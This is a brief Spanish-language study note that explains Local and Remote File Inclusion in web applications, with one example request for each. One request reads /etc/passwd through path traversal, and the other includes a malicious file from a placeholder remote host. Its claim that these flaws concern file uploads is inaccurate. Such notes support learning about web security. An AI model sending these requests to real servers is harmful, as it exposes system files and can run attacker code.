7. LFI/RFI

Estas vulnerabilidades afectan a la subida de ficheros en una aplicación web.

1. Local File Inclusion

Acceso a ficheros dentro de un mismo servidor, ejecutando código en la aplicación para acceder a recursos del servidor.

GET dominio.meow/ejemplolfi.php?file=../../../etc/passwd HTTP/1.1

2. Remote File Inclusion

Acceso a ficheros en servidores remotos.

GET dominio.meow/ejemplorfi.php?file=dominioRemoto/ficheroMalicioso HTTP/1.1

Recursos:

• https://www.busybox.net/

• https://pentestmonkey.net/